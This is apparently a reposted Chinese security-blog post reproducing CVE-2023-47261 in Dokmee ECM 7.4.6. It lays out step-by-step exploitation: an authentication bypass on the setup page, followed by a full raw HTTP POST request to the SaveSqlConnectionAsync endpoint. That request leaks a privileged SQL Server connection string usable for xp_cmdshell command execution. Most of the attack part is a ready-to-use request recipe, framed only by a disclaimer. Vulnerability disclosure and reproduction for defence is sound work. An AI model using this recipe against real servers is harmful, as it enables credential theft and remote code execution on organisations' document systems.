本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Dokmee ECM是一款国外企业内容管理 (ECM) 软件。每个公司的办公室每个角落都存放着文档、记录和档案。Dokmee 一系列解决方案可以帮助您高效地组织、保护和管理这些文件。支持的文件:PDF、TIFF、Word、Excel、Auto-CAD 绘图、电子邮件等。Dokmee 可以帮助您立即实现数字化并管理您的所有企业内容需求。
开发语言:ASP.Net
开发厂商:https:
//www.dokmee.com/
漏洞描述
Dokmee ECM 7.4.6 允许远程执行代码,因为对 GettingStarted/SaveSQLConnectionAsync /#/gettingstarted 请求的响应包含用于特权 SQL Server 数据库访问的连接字符串,并且可以启用 xp_cmdshell。
空间测绘
回复“CVE-2023-47261”获取空间测绘语句
漏洞利用
1.访问“http://xxx.xxx.xxx/#/gettingstarted”,若自动跳转至登陆就多访问几次。
2.点击“Setup”,后在“Enter Key”处输入“”绕过认证,点击“Next”。
3.随便输入配置,点击“Next”,响应包中返回了系统数据库配置,大部分连接数据库就可以xp_cmdshell了。
请求数据包如下:
POST
/dws/GettingStarted/SaveSqlConnectionAsync
HTTP/1.1
Host
: xxx.xxx.xxx
Connection
: close
Content-Length
: 216
sec-ch-ua
: "(Not(A:Brand";v="99", "Chromium";v="115", "Google Chrome";v="115"
Accept
: application/json, text/plain, */*
Content-Type
: text/plain
sec-ch-ua-mobile
: ?0
API_KEY
: MjAyMzEyMTU2MzgzODIxx4QMtsNzg3NjMzMzAwMDBiMzc1FqtkGfMTAyY2QxNzM0MjZkOWQwStQDfqMGMxZDBhOGIyZmRmYQ==G3k6W9r00qV1aTuxacjHyj9MQCHMSgftG2CHPzMoqvOwEnbk4Pp6RnuAVu7glpk3hcDA==
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5808.208 Safari/537.36
sec-ch-ua-platform
: "macOS"
Origin
: http://xxx.xxx.xxx
Sec-Fetch-Site
: same-origin
Sec-Fetch-Mode
: cors
Sec-Fetch-Dest
: empty
Referer
: http://xxx.xxx.xxx/
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
vVo2dxT8CZLPWAd4NTAPEsNz2YxD9Qgvqg9wPzUFHSnu0zC0P75Kx4Pfo7dtuGClku4SUTsmJN2wlUrhjOWnWOYgV/ru7vHzOD0Id/bMaVXBq7ovsLtkT9C1TFolLxvpIk58nq89DywgMj8aDAqYCPvGp22ecgIcdF2Nq9LRvPuI7MVvMEcldR5fucxLcHJO4BLUFBvStXaWMAC650v/6Q==
参考链接
https:
/
/nvd.nist.gov/vuln
/detail/
CVE-
2023
-
47261
https:
/
/h3x0s3.github.io/
CVE2023~
47261
/
原文始发于微信公众号(不够安全):[漏洞复现]CVE-2023-47261 Dokmee ECM信息泄露致远程命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论